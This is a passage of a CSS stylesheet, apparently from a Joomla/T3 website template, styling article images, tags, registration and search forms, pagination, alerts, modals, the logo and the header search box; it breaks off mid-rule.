.img-intro-none,
.img-intro-left,
.img-intro-right,
.img-fulltext-none,
.img-fulltext-left,
.img-fulltext-right,
.img_caption {
  position: relative;
  margin-bottom: 20px;
  max-width: 100%;
}
.img-fulltext-left {
  float: left;
}
.img-fulltext-right {
  float: right;
}
.img_caption > img {
  margin-bottom: 1px !important;
}
.img_caption p.img_caption {
  background: #eeeeee;
  color: #666666;
  font-size: 12px;
  width: 100%;
  margin: 0;
  padding: 5px;
  text-align: center;
  clear: both;
}
.pull-right.article-image-intro {
  float: left !important;
  margin-left: 0 !important;
}
.pull-right.article-image-intro img {
  margin-left: 0 !important;
  margin-right: 20px;
}
@media screen and (max-width: 992px) {
  article img,
  .article-intro img,
  article img[align=left],
  .article-intro img[align=left],
  article img[align=right],
  .article-intro img[align=right],
  article .img_caption,
  .article-intro .img_caption,
  article .article-image-full,
  .article-intro .article-image-full,
  article .article-image-intro,
  .article-intro .article-image-intro,
  article .img-intro-none,
  .article-intro .img-intro-none,
  article .img-intro-left,
  .article-intro .img-intro-left,
  article .img-intro-right,
  .article-intro .img-intro-right,
  article .img-fulltext-none,
  .article-intro .img-fulltext-none,
  article .img-fulltext-left,
  .article-intro .img-fulltext-left,
  article .img-fulltext-right,
  .article-intro .img-fulltext-right {
    float: none !important;
    margin-left: 0;
    margin-right: 0;
    width: 100% !important;
  }
}
.item-page .tags {
  border-top: 1px solid #eeeeee;
  padding: 10px 0;
}
.item-page .tags span {
  display: inline-block;
  margin-bottom: 10px;
}
.item-page .tags a {
  background: #ffffff;
  border: 1px solid #eeeeee;
  border-radius: 3px;
  color: #666666;
  padding: 5px;
}
.item-page .tags a:hover,
.item-page .tags a:focus,
.item-page .tags a:active {
  background: #999999;
  border-color: #999999;
  color: #800000;
}
.archive .filters {
  margin: 0 0 20px;
}
#archive-items article {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
  padding-bottom: 20px;
}
#archive-items article h2.article-title {
  font-size: 24px;
  line-height: 1.3;
}
article aside .btn-group > .dropdown-toggle,
article aside .btn-group > .dropdown-toggle:hover,
article aside .btn-group > .dropdown-toggle:active,
article aside .btn-group > .dropdown-toggle:focus {
  padding: 2px 5px;
}
article aside .btn-group > .dropdown-toggle .caret {
  margin-left: 2px;
}
.tag-category .filters {
  border-bottom: 1px solid #eeeeee;
  padding: 20px 0;
}
.tag-category .filters #filter-search {
  float: left;
}
.tag-category .filters.btn-toolbar > .btn-group {
  margin-left: 0;
}
.tag-category .thumbnails {
  list-style: none;
  margin: 0;
  padding: 0;
}
.tag-category .thumbnails li {
  background: transparent;
  border-bottom: 1px solid #eeeeee;
  padding: 10px 0;
}
.tag-category .thumbnails li > h3 {
  margin-top: 0;
}
.tag-category .com-tags-filter-field-wrap {
  display: flex;
  flex-wrap: wrap;
  justify-content: space-between;
  margin-bottom: 2rem;
}
.tag-category .com-tags-filter-field-wrap .btn-group {
  display: flex;
  margin-right: 0;
}
.readmore {
  margin-top: 20px;
}
.row-even,
.row-odd {
  padding: 5px;
  width: 99%;
  border-bottom: 1px solid #dddddd;
}
.row-odd {
  background-color: transparent;
}
.row-even {
  background-color: #f9f9f9;
}
.blog-row-rule,
.blog-item-rule {
  border: 0;
}
.row-fluid .row-reveal {
  visibility: hidden;
}
.row-fluid:hover .row-reveal {
  visibility: visible;
}
.nav-list > li.offset > a {
  padding-left: 30px;
  font-size: 12px;
}
.list-striped,
.row-striped {
  list-style: none;
  line-height: 20px;
  text-align: left;
  vertical-align: middle;
  border-top: 1px solid #dddddd;
  margin-left: 0;
  padding-left: 0;
}
.list-striped li,
.list-striped dd,
.row-striped .row,
.row-striped .row-fluid {
  border-bottom: 1px solid #dddddd;
  padding: 10px 15px;
}
.list-striped li:nth-child(odd),
.list-striped dd:nth-child(odd),
.row-striped .row:nth-child(odd),
.row-striped .row-fluid:nth-child(odd) {
  background-color: #f9f9f9;
}
.list-striped li:hover,
.list-striped dd:hover,
.row-striped .row:hover,
.row-striped .row-fluid:hover {
  background-color: #f5f5f5;
}
.row-striped .row-fluid {
  width: 97%;
}
.row-striped .row-fluid [class*="span"] {
  min-height: 10px;
}
.row-striped .row-fluid [class*="span"] {
  margin-left: 8px;
}
.row-striped .row-fluid [class*="span"]:first-child {
  margin-left: 0;
}
.list-condensed li {
  padding: 5px 10px;
}
.row-condensed .row,
.row-condensed .row-fluid {
  padding: 5px 10px;
}
.list-bordered,
.row-bordered {
  list-style: none;
  line-height: 18px;
  text-align: left;
  vertical-align: middle;
  margin-left: 0;
  border: 1px solid #dddddd;
}
.login-wrap .other-links ul {
  padding-left: 20px;
}
#jform_privacyconsent_privacy-lbl a.modal,
#jform_consentbox-lbl a.modal,
#jform_terms_terms-lbl a.modal,
#jform_profile_tos-lbl a.modal {
  display: inline-block;
  position: relative;
}
#jform_terms_terms input[type="radio"],
#jform_privacyconsent_privacy input[type="radio"],
#jform_consentbox input[type="radio"],
#jform_profile_tos input[type="radio"],
#jform_terms_terms input[type="checkbox"],
#jform_privacyconsent_privacy input[type="checkbox"],
#jform_consentbox input[type="checkbox"],
#jform_profile_tos input[type="checkbox"] {
  position: relative;
  margin: 0;
  margin-right: 5px;
  width: auto;
}
#jform_terms_terms label,
#jform_privacyconsent_privacy label,
#jform_consentbox label,
#jform_profile_tos label {
  margin-right: 10px;
  padding: 0;
}
.form-register fieldset {
  padding: 0 0 10px;
}
.form-register p {
  margin: 0 0 5px;
}
.form-register p.form-des {
  margin: 15px 0;
}
.form-register label {
  display: block;
  float: left;
  font-weight: bold;
  text-align: right;
  width: 130px;
}
.form-register .input,
.form-register .inputbox {
  margin-left: 10px;
  width: 200px;
}
.form-register .btn,
.form-register .button {
  margin-left: 140px;
}
.registration fieldset dt {
  margin-right: 5px;
}
.admintable textarea {
  max-width: 90% !important;
  resize: none;
}
.com_mailto body {
  padding: 10px;
}
.com_mailto .t3-mainbody {
  padding-top: 0;
  padding-bottom: 0;
}
.com_mailto .t3-content {
  width: auto;
}
#mailto-window {
  background: #fff;
  margin: 10px 0 20px;
  padding: 0;
  position: relative;
}
#mailto-window h2 {
  margin-top: 0;
  margin-bottom: 20px;
}
#mailtoForm .formelm {
  padding: 5px 0;
  vertical-align: middle;
  overflow: hidden;
}
#mailtoForm .formelm label {
  display: inline-block;
  float: left;
  font-weight: bold;
  vertical-align: middle;
  width: 100px;
}
#mailtoForm p {
  margin-top: 20px;
}
#mailtoForm .input,
#mailtoForm .inputbox {
  width: 65%;
}
#mailtoForm .btn,
#mailtoForm .button,
#mailtoForm button {
  margin-right: 5px;
}
.user-details {
  padding: 10px 0;
}
.user-details p {
  margin: 0 0 5px;
}
.user-details label {
  display: block;
  float: left;
  font-weight: bold;
  text-align: right;
  width: 130px;
}
.user-details .input,
.user-details .inputbox {
  margin-left: 10px;
  width: 200px;
}
.user-details .btn,
.user-details button {
  margin-left: 140px;
}
.user-details .paramlist .paramlist_key {
  padding: 0 0 5px;
  width: 130px;
}
.user-details .paramlist .paramlist_value {
  padding: 0 0 5px;
}
.user-details .user_name span {
  font-weight: bold;
  padding-left: 10px;
}
.reset .form-validate p,
.remind .form-validate p {
  background: #eeeeee;
  border: 1px solid #eeeeee;
  margin-bottom: 20px;
  padding: 10px 20px;
  border-radius: 0;
}
.reset .form-validate fieldset dl,
.remind .form-validate fieldset dl {
  margin: 0;
}
.reset .form-validate fieldset dt,
.remind .form-validate fieldset dt {
  margin: 4px 0 0 0;
}
.profile-edit input {
  position: relative;
  min-height: 1px;
  padding-right: 6px;
  padding-left: 6px;
}
@media (min-width: 768px) {
  .profile-edit input {
    float: left;
    width: 50%;
  }
}
.profile-edit select {
  position: relative;
  min-height: 1px;
  padding-right: 6px;
  padding-left: 6px;
}
@media (min-width: 768px) {
  .profile-edit select {
    float: left;
    width: 50%;
  }
}
.profile-edit select + button {
  margin-left: 5px;
}
#searchForm:before,
#searchForm:after {
  display: table;
  content: " ";
}
#searchForm:after {
  clear: both;
}
#searchForm fieldset {
  margin: 20px 0;
}
#searchForm legend {
  margin-bottom: 10px;
}
#searchForm select {
  width: auto;
  display: inline-block;
  margin-left: 5px;
  padding-left: 5px;
}
#searchForm .form-limit {
  margin-top: 20px;
}
#searchForm .form-limit .counter {
  margin-top: 0;
  border: none;
  font-size: 14px;
  font-weight: bold;
  color: #0077bb;
}
@media screen and (max-width: 768px) {
  #searchForm .radio-inline,
  #searchForm .checkbox-inline {
    display: block;
    width: 100%;
    margin-left: 0;
  }
}
.search-results {
  margin-top: 20px;
}
.search-results .result-title {
  font-size: 16px;
  font-weight: bold;
  margin-top: 20px;
}
.search-results .result-category {
  font-size: 12px;
  color: #999999;
}
.search-results .result-text {
  margin-top: 5px;
  margin-bottom: 5px;
}
.search-results .result-url {
  color: #666666;
  margin-top: 20px;
}
.search-results .result-created {
  font-size: 12px;
  color: #999999;
}
div.finder {
  margin-bottom: 20px;
}
div.finder .input-group {
  display: flex;
}
div.finder .input-group input {
  flex: 1;
}
div.finder .com-finder__tips {
  margin-top: 20px;
}
#finder-filter-window {
  margin-top: 20px;
}
#finder-filter-window #finder-filter-select-dates {
  display: grid;
  grid-template-columns: 1fr;
  gap: 10px;
  margin-bottom: 40px;
}
@media screen and (min-width: 1200px) {
  #finder-filter-window #finder-filter-select-dates {
    grid-template-columns: repeat(2, 1fr);
  }
}
#finder-filter-window #finder-filter-select-dates .filter-date {
  display: flex;
  flex-wrap: wrap;
  padding: 0;
  gap: 10px;
  width: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date label {
  flex-basis: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date select.inputbox {
  margin: 0;
  width: 100% !important;
  max-width: unset;
}
#finder-filter-window #finder-filter-select-dates .filter-date .field-calendar {
  width: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date .field-calendar .form-control {
  flex: 1;
  max-width: unset;
  width: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date .chzn-container {
  margin-bottom: 6px;
}
#finder-filter-window #finder-filter-select-dates .filter-date br {
  display: none;
}
#finder-filter-window .filter-branch {
  display: flex;
  flex-wrap: wrap;
  flex-direction: column;
  gap: 10px;
  width: 100%;
}
@media (min-width: 1200px) {
  #finder-filter-window .filter-branch {
    flex-direction: row;
  }
}
#finder-filter-window .filter-branch .control-label {
  padding: 0;
  margin-bottom: 10px;
}
#finder-filter-window .filter-branch .controls {
  margin-left: 0;
}
#finder-filter-window .filter-branch .controls select {
  color: #9e9e9e;
  width: 100%;
}
.contact .contact-form .checkbox input#jform_contact_email_copy {
  margin-left: 0;
}
.contact .thumbnail {
  padding: 4px;
}
.contact dd::after {
  display: none;
}
.contact .icon-address::before {
  content: '\f02d';
}
.contact .icon-fax::before {
  content: '\f109';
}
.contact .accordion-heading .accordion-toggle {
  font-weight: bold;
}
#archive-items > li {
  line-height: normal;
  margin: 0;
  overflow: visible;
  padding: 0;
}
#archive-items .intro {
  clear: both;
  overflow: hidden;
}
.categories-list {
  margin-bottom: 20px;
}
.contact-category ul.category {
  border-top: 0;
  overflow: hidden;
}
.contact-category ul.category li.row-fluid {
  border: 1px solid #eeeeee;
  width: 100%;
  margin-right: 0;
  margin-left: 0;
}
.contact-category ul.category li.row-fluid:before,
.contact-category ul.category li.row-fluid:after {
  display: table;
  content: " ";
}
.contact-category ul.category li.row-fluid:after {
  clear: both;
}
.contact-category ul.category li.row-fluid > div {
  margin: 0;
}
.contact-category .cat-children ul {
  border: 0;
  border-top: 1px solid #eeeeee;
}
.contact-category .cat-children ul li {
  background: transparent;
  border-bottom: 1px solid #eeeeee;
  padding: 5px 0 5px 0;
}
.contact-category .cat-children ul li h4 {
  border-left: 1px dotted #999999;
  font-size: 14px;
  font-weight: 600;
  padding: 0;
  padding-left: 15px;
  margin-left: 20px;
  position: relative;
}
.contact-category .cat-children ul li h4:after {
  border-top: 1px dotted #999999;
  display: block;
  content: "";
  position: absolute;
  left: 0;
  top: 8px;
  height: 1px;
  width: 10px;
}
.contact-category .cat-children ul li li h4 {
  margin-left: 40px;
}
.contact-category .cat-children ul li li li h4 {
  margin-left: 60px;
}
.contact-category .cat-children ul li li li li h4 {
  margin-left: 80px;
}
.contact-category .cat-children ul li:last-child {
  border: 0;
}
.category-item:before,
.category-item:after {
  display: table;
  content: " ";
}
.category-item:after {
  clear: both;
}
.category-item .page-header {
  line-height: normal;
  padding: 10px 5px;
  margin: 0;
  font-size: 18px;
  font-weight: normal;
}
.category-item .category-item {
  margin-bottom: 0;
  margin-left: 40px;
}
.category-item .category-item .page-header {
  font-size: 14px;
}
.cat-children .page-header {
  line-height: normal;
  padding: 10px 5px;
  margin: 0;
  font-size: 18px;
  font-weight: normal;
}
.newsfeed-category > h2,
.newsfeed > h2 {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 20px;
  margin-bottom: 20px;
  margin-top: 0;
}
.newsfeed-category .category-desc,
.newsfeed .category-desc {
  margin-bottom: 20px;
}
.newsfeed-category .category li:before,
.newsfeed .category li:before,
.newsfeed-category .category li:after,
.newsfeed .category li:after {
  display: table;
  content: " ";
}
.newsfeed-category .category li:after,
.newsfeed .category li:after {
  clear: both;
}
.newsfeed > h2 {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 20px;
  margin-bottom: 20px;
  margin-top: 0;
}
.newsfeed .feed-description {
  margin-bottom: 20px;
  font-size: 16px;
}
.newsfeed .feed-item-description .feed-description {
  font-size: 14px;
}
.newsfeed ol li > a {
  font-weight: bold;
  font-size: 16px;
}
.article-content .pagination ul {
  border-left: 1px solid #eeeeee;
}
.article-content .pagination li {
  float: left;
  padding: 10px 20px;
  line-height: normal;
  border: 1px solid #eeeeee;
  border-left: 0;
}
.article-content .pagination li a {
  border: 0;
  text-decoration: none;
  background-color: transparent;
  line-height: normal;
  padding: 0;
}
.pagenavcounter {
  margin: 0 0 20px;
  font-weight: bold;
}
#article-index,
.article-index {
  margin: 0 0 20px 20px;
  padding: 10px;
  width: 25%;
  border: 1px solid #eeeeee;
  border-radius: 0;
}
#article-index ul,
.article-index ul {
  margin: 0;
  padding: 0;
  border: 0;
}
#article-index ul > li,
.article-index ul > li {
  border: 0;
  margin-top: 2px;
}
#article-index ul > li > a,
.article-index ul > li > a {
  border: 0;
  padding: 5px;
  border-radius: 0;
}
#article-index ul > .active > a,
.article-index ul > .active > a {
  border: 0;
  background: #cc0000;
  color: #ffffff;
}
#article-index ul > .active > a:hover,
.article-index ul > .active > a:hover,
#article-index ul > .active > a:active,
.article-index ul > .active > a:active,
#article-index ul > .active > a:focus,
.article-index ul > .active > a:focus {
  border: 0;
  background: #cc0000;
  color: #ffffff;
}
.pagenavigation ul.pagination,
.pagenav {
  float: none;
  margin: 0;
  padding: 0;
  list-style: none;
  display: flex;
  justify-content: space-between;
}
.pagenavigation ul.pagination > li,
.pagenav > li {
  margin: 0;
  padding: 0;
  float: left;
}
.pagenavigation ul.pagination > li.pagenav-prev,
.pagenav > li.pagenav-prev,
.pagenavigation ul.pagination > li.previous,
.pagenav > li.previous {
  margin-right: 10px;
}
.pagenavigation ul.pagination > li.pagenav-next,
.pagenav > li.pagenav-next,
.pagenavigation ul.pagination > li.next,
.pagenav > li.next {
  margin-left: auto;
}
.pagenavigation ul.pagination li > a,
.pagenav li > a {
  padding: 10px 20px;
  line-height: normal;
  border: 1px solid #dddddd;
  border-radius: 0;
}
.pagenavigation ul.pagination li > a:hover,
.pagenav li > a:hover,
.pagenavigation ul.pagination li > a:active,
.pagenav li > a:active,
.pagenavigation ul.pagination li > a:focus,
.pagenav li > a:focus {
  background-color: #eeeeee;
}
.items-more h3 {
  margin: 0 0 20px;
}
.items-more .nav > li {
  border-top: 1px solid #eeeeee;
}
.items-more .nav > li > a {
  padding: 6px 5px;
}
.back_button a {
  display: block;
  margin: 10px 0;
}
.filters {
  margin: 10px 0 5px;
}
.display-limit {
  margin: 10px 0 5px;
}
.filters .display-limit {
  float: right;
  text-align: right;
}
#system-message dt {
  font-weight: bold;
}
#system-message dd {
  font-weight: bold;
}
#system-message dd.message ul,
#system-message dd.error ul,
#system-message dd.notice ul {
  margin: 0;
  padding: 0;
}
#system-message dd.message ul li,
#system-message dd.error ul li,
#system-message dd.notice ul li {
  background: none;
  margin: 0;
  padding: 5px;
}
.alert-message {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
.alert-message hr {
  border-top-color: #c9e2b3;
}
.alert-message .alert-link {
  color: #356635;
}
.alert-notice {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.alert-notice hr {
  border-top-color: #a6e1ec;
}
.alert-notice .alert-link {
  color: #2d6987;
}
.alert-error {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.alert-error hr {
  border-top-color: #e4b9c0;
}
.alert-error .alert-link {
  color: #953b39;
}
.alert-error .alert-message {
  background: transparent;
  color: inherit;
}
.tip-wrap {
  background: #fff6df;
  border: 1px solid #fb3;
  border-radius: 5px;
  -webkit-box-shadow: none;
  box-shadow: none;
  max-width: 300px;
  z-index: 999;
}
.tip-title {
  border-bottom: 1px solid #fb3;
  font-weight: bold;
  padding: 5px 10px;
}
.tip-text {
  font-size: 14px;
  margin: 0;
  padding: 5px 10px;
}
.hasTip img {
  border: none;
  margin: 0 5px 0 0;
}
@media (min-width: 768px) {
  .languageswitcherload {
    float: right;
    width: 100%;
  }
  .languageswitcherload .mod-languages {
    text-align: right;
  }
}
div.calendar {
  width: 187px;
}
dl.tabs {
  border-bottom: 1px solid #d9d9d9;
  display: block;
  clear: both;
  margin-bottom: 0;
}
dl.tabs:before,
dl.tabs:after {
  display: table;
  content: " ";
}
dl.tabs:after {
  clear: both;
}
dl.tabs dt.tabs {
  border: 1px solid #d9d9d9;
  display: inline-block;
  padding: 10px 20px;
  margin-right: 5px;
  margin-bottom: -1px;
}
dl.tabs dt.tabs h3 {
  margin: 0;
  font-size: 14px;
}
dl.tabs dt.tabs h3 a {
  color: #444444;
  outline: none;
}
dl.tabs dt.tabs h3 a:hover,
dl.tabs dt.tabs h3 a:focus,
dl.tabs dt.tabs h3 a:active {
  color: #800000;
  text-decoration: none;
}
dl.tabs dt.tabs.open {
  border-bottom-color: #ffffff;
}
dl.tabs dt.tabs.open a {
  font-weight: bold;
}
.iframe-bordered {
  border: 1px solid #dddddd;
}
.chzn-container {
  display: inline-block;
  vertical-align: middle;
}
.chzn-container-single .chzn-single,
.chzn-container-multi .chzn-choices .search-field input,
.chzn-container-single .chzn-search input {
  height: 26px;
}
.chzn-container-single .chzn-drop,
.chzn-container .chzn-drop {
  -webkit-box-sizing: content-box !important;
  -moz-box-sizing: content-box !important;
  box-sizing: content-box !important;
}
.input-prepend .chzn-container-single .chzn-single {
  border-color: #cccccc;
  height: 26px;
  border-radius: 0 3px 3px 0;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.input-prepend .chzn-container-active .chzn-single-with-drop {
  border-radius: 0 3px 0 0;
}
.input-prepend .chzn-container-single .chzn-drop {
  border-color: #cccccc;
}
.btn-group .chzn-results {
  white-space: normal;
}
.js-stools-container-filters .js-stools-field-filter .chzn-single,
.js-stools-container-filters .js-stools-field-filter .chzn-drop {
  border-radius: 0;
}
.js-stools-container-filters .js-stools-field-filter #filter_tag_chzn,
.js-stools-container-filters .js-stools-field-filter #filter_category_id_chzn,
.js-stools-container-filters .js-stools-field-filter #filter_access_chzn,
.js-stools-container-filters .js-stools-field-filter #filter_author_id_chzn {
  width: auto !important;
}
.js-stools-container-filters .js-stools-field-filter #filter_tag_chzn ul li input,
.js-stools-container-filters .js-stools-field-filter #filter_category_id_chzn ul li input,
.js-stools-container-filters .js-stools-field-filter #filter_access_chzn ul li input,
.js-stools-container-filters .js-stools-field-filter #filter_author_id_chzn ul li input {
  width: 208px !important;
  height: 24px !important;
}
.picker {
  background: green !important;
}
.picker .picker__box .picker__header {
  display: flex;
}
.picker .picker__box .picker__header .picker__select--month {
  margin-left: 20px;
}
#glossary-detail .modal-dialog {
  height: 100vh;
  position: relative;
}
#glossary-detail .modal-content {
  padding: 24px;
  position: absolute;
  top: 50%;
  transform: translateY(-50%);
}
#glossary-detail .modal-content .modal-header {
  flex-direction: row-reverse;
  justify-content: space-between;
  padding: 0 0 24px;
}
#glossary-detail .modal-content .modal-header::after,
#glossary-detail .modal-content .modal-header::before {
  display: none;
}
#glossary-detail .modal-content .modal-header .close {
  padding: 6px 10px;
  background-color: #005788;
  color: #fff;
  opacity: 1;
  transition: all 0.3s ease-in-out;
}
#glossary-detail .modal-content .modal-header .close:hover {
  opacity: .7;
}
#glossary-detail .modal-content .modal-body {
  margin-top: 24px;
}

.page-header {
  padding-bottom: 20px;
  margin: 0 0 20px;
  border-bottom: 1px solid #eeeeee;
}
.page-title,
.page-header h1 {
  line-height: 1;
  margin: 0;
}
.page-subheader {
  border-bottom: 1px solid #eeeeee;
  margin: 0 0 20px;
  padding-bottom: 20px;
}
.page-subheader:before,
.page-subheader:after {
  display: table;
  content: " ";
}
.page-subheader:after {
  clear: both;
}
.page-subtitle,
.page-subheader h2 {
  line-height: 1;
  margin: 0;
}
.page-header + .page-subheader {
  margin-top: -20px;
}
.article-title h1 a:hover,
.article-header h1 a:hover,
.article-title h2 a:hover,
.article-header h2 a:hover,
.article-title h1 a:active,
.article-header h1 a:active,
.article-title h2 a:active,
.article-header h2 a:active,
.article-title h1 a:focus,
.article-header h1 a:focus,
.article-title h2 a:focus,
.article-header h2 a:focus {
  text-decoration: none;
}
.article-title,
.article-header h1 {
  margin: 0 0 20px 0;
}
@media screen and (max-width: 767px) {
  .article-title,
  .article-header h1 {
    font-size: 24px;
  }
}
@media screen and (max-width: 767px) {
  h2.article-title,
  .article-header h2 {
    font-size: 24px;
  }
}
.item-title {
  font-weight: bold;
}
.jumbotron:before,
.jumbotron:after {
  display: table;
  content: " ";
}
.jumbotron:after {
  clear: both;
}
.jumbotron h1,
.jumbotron h2,
.jumbotron h3 {
  margin-top: 0;
}
.jumbotron p {
  color: #666666;
}
.jumbotron p:last-child {
  margin-bottom: 0;
}
.container .jumbotron {
  border-radius: 0;
}
.jumbotron .btn {
  margin-top: 20px;
  margin-bottom: 20px;
}
.masthead {
  padding-top: 40px;
  padding-bottom: 40px;
  text-align: center;
}
.masthead p:last-child {
  margin-bottom: 0;
}
@media screen and (min-width: 992px) {
  .masthead {
    padding-top: 80px;
    padding-bottom: 80px;
  }
  .masthead h1 {
    font-size: 84px;
  }
  .masthead p {
    font-size: 28px;
  }
  .masthead .btn-lg {
    padding: 15px 40px;
    font-size: 24px;
  }
}
.jumbotron-primary {
  background-color: #cc0000;
}
.jumbotron-primary h1,
.jumbotron-primary h2,
.jumbotron-primary h3 {
  color: #ffffff;
}
.jumbotron-primary p {
  color: #ffcccc;
}
.jumbotron-primary .btn-primary {
  border-color: #fff;
}
.page-masthead:before,
.page-masthead:after {
  display: table;
  content: " ";
}
.page-masthead:after {
  clear: both;
}
.page-masthead .jumbotron {
  margin-top: 0 !important;
  margin-bottom: 0 !important;
  padding-top: 60px;
  padding-bottom: 60px;
  padding-left: 0;
  padding-right: 0;
}
@media screen and (max-width: 991px) {
  .page-masthead .jumbotron {
    padding-top: 40px;
    padding-bottom: 40px;
  }
}
@media screen and (max-width: 767px) {
  .page-masthead .jumbotron {
    padding-left: 20px;
  }
  .page-masthead .jumbotron .container {
    padding: 0;
  }
}
.label {
  border-radius: 0;
}
.label:empty {
  display: none;
}
.badge:empty {
  display: none;
}
.btn .badge {
  position: relative;
  top: -1px;
}
.page-header .label,
.page-header .badge {
  vertical-align: middle;
}
.thumbnail {
  padding: 0;
  margin-bottom: 40px;
}
.alert h4 {
  color: inherit;
}
.media:first-child {
  margin-top: 0;
}
.media-object {
  display: block;
}
.media-heading {
  margin: 0 0 5px;
}
.media > .pull-left {
  margin-right: 10px;
}
.media > .pull-right {
  margin-left: 10px;
}
.list-group-item > .badge {
  float: right;
}
.list-group-item > .badge + .badge {
  margin-right: 5px;
}
a.list-group-item.active .list-group-item-heading,
a.list-group-item.active:hover .list-group-item-heading,
a.list-group-item.active:focus .list-group-item-heading {
  color: inherit;
}
a.list-group-item.active .list-group-item-text,
a.list-group-item.active:hover .list-group-item-text,
a.list-group-item.active:focus .list-group-item-text {
  color: #ff9999;
}
.panel-heading > .dropdown .dropdown-toggle {
  color: inherit;
}
.panel-title > a {
  color: inherit;
}
.modal-backdrop.fade {
  filter: alpha(opacity=0);
  opacity: 0;
}
.modal-backdrop.in {
  filter: alpha(opacity=50);
  opacity: 0.5;
}
.modal-header {
  border-bottom: 0;
  padding: 20px 40px 0;
}
.modal-title {
  font-size: 35px;
}
.modal-body {
  padding: 10px 40px 20px;
}
.modal-body iframe {
  width: 100%;
  max-height: none;
  border: 0 !important;
}
@media screen and (min-width: 768px) {
  .modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .modal-content {
    -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
  }
}

.logo {
  position: absolute;
  top: 0;
  left: 0;
  padding: 0;
  margin: 0;
}
.logo a {
  background: transparent;
  color: #fff;
  text-decoration: none;
  display: inline-block;
  line-height: 1;
  margin: 0;
}
.logo:hover a,
.logo a:hover,
.logo a:active,
.logo a:focus {
  background: #b30000;
  color: #ffffff;
  text-decoration: none;
}
@media screen and (min-width: 991px) {
  .logo {
    position: static;
  }
  .logo a {
    background: #b30000;
  }
  .logo:hover a,
  .logo a:hover,
  .logo a:active,
  .logo a:focus {
    color: #ffffff;
  }
}
.off-canvas-toggle + .container .navbar-header .logo {
  left: 55px;
  border-left: 1px solid #b30000;
}
@media screen and (min-width: 991px) {
  .off-canvas-toggle + .container .navbar-header .logo {
    border-left: 0;
  }
}
.logo-image > a {
  max-width: 160px;
  max-height: 55px;
}
.logo-image > a > img {
  max-width: 100%;
}
.logo-image span,
.logo-image small {
  display: none;
}
.logo-text {
  text-transform: uppercase;
  font-size: 18px;
}
.logo-text a {
  line-height: 55px;
  padding: 0 20px;
}
.logo-text .site-slogan {
  display: none;
}
.head-search {
  height: 55px;
  position: absolute;
  right: 0;
  margin: 0;
  z-index: 1000;
}
.head-search form {
  margin: 0;
}
.head-search label {
  display: none;
}
.head-search .search {
  background: #cc0000;
  border-left: 1px solid #b30000;
  border-right: 1px solid #b30000;
  position: relative;
}
@media screen and (min-width: 991px) {
  .head-search .search {
    background: #b30000;
  }
}
.head-search .search .fa-search {
  color: #ffcccc;
  content: "\f002";
  display: block;
  font-family: "FontAwesome";
  position: absolute;
  left: 20px;
  top: 19px;
  z-index: 1;
}
.head-search .search .fa-search:hover {
  z-index: 0;
}
.head-search .form-control {
  border: 0;
  background: transparent;
  color: #ffcccc;
  height: 54px;
  line-height: 35px;
  position: relative;
  margin: 0;
  padding: 10px 15px 10px 40px;
  width: 0;
  -webkit-transition: width 0.2s;
  -o-transition: width 0.2s;
  transition: width 0.2s;
}
@media screen and (min-width: 991px) {
  .head-search .form-control {
    height: 55px;
  }
}
.head-search .form-control:hover,
.head-search .form-control:active,
.head-search .form-control:focus {
  color: #ffffff;
  box-shadow: none;
}
.head-search .form-control:active,
.head-search .form-control:focus {
  width: 180px;
}
.head-search .form-control:-webkit-autofill {
  -webkit-box-shadow: 0 0 0 1000px #0067a2 inset;
  -webkit-text-fill-color: #ffffff;
}
.head-search .form-control::-moz-placeholder {
  color: #ffffff;
}
.head-search .mod-finder input {
  z-index: 10;
}
.head-search .mod-finder > .awesomplete {
  position: relative;
}
.head-search .mod-finder > .awesomplete::after {
  content: '\f002';
  color: #bbe6ff;
  display: inline-block;
  font-family: "FontAwesome";
  height: 16px;
  width: 16px;
  position: absolute;
  top: 19px;
  margin-left: 20px;
}
.head-search .mod-finder .mod-finder__search input {
  width: 100px;
  padding: 10px 15px;
}
@media screen and (max-width: 576px) {
  .head-search .mod-finder .mod-finder__search input {
    width: 50px;
  }
}
.head-search .mod-finder .mod-finder__search input:focus {
  width: 200px;
}
.navbar-toggle + .head-search {
  right: 55px;
  max-width: 57px;
}
@media screen and (max-width: 990px) {
  .navbar-toggle + .head-search {
    max-width: inherit;
  }
  .navbar-toggle + .head-search:hover,
  .navbar-toggle + .head-search:focus,
  .navbar-toggle + .head-search:active {
    max-width: none;
  }
  .navbar-toggle + .head-search:hover .form-control,
  .navbar-toggle + .head-search:focus .form-control,
  .navbar-toggle + .head-search:active .form-control {
    width: 180px;
  }
}
@media screen and (min-width: 991px) {
  .head-search,
  .navbar-toggle + .head-search {
    right: 20px;
    top: 0;
    max-width: none;
  }
}
.chzn-container-multi .chzn-choices li.search-field input[type="text"] {
  height: 30px;
}
.chzn-container {
  max-width: 100%;
}
.chzn-container .chzn-single {
  max-width: 260px;
}
.ie8 .radio.t3onoff {
  border: 0;
}
.ie8 label.on,
.ie8 label.off {
  border: 1px solid #eeeeee;
}
.pagination > li > a,
.pagination > li > span {
  margin-bottom: 10px;
}
#eblog-wrapper {
  line-height: 1.625;
}
.com_weblinks .weblink-categories .page-header.item-title .btn {
  padding: 5px;
}
.com_weblinks .weblink-categories .page-header.item-title .btn .fa-minus {
  display: block;
}
.com_weblinks .weblink-categories .page-header.item-title .btn .fa-plus {
  display: none;
}
.com_weblinks .weblink-categories .page-header.item-title .btn.collapsed .fa-minus {
  display: none;
}
.com_weblinks .weblink-categories .page-header.item-title .btn.collapsed .fa-plus {
  display: block;
}
.t3-spotlight {
  display: -webkit-flex;
  display: flex;
  -webkit-flex-flow: row wrap;
  flex-flow: row wrap;
}
@media screen and (max-width: 767px) {
  .t3-spotlight > div {
    margin-bottom: 20px;
  }
}
@media screen and (min-width: 992px) {
  .t3-spotlight:not(:root:root) .col-md-3 {
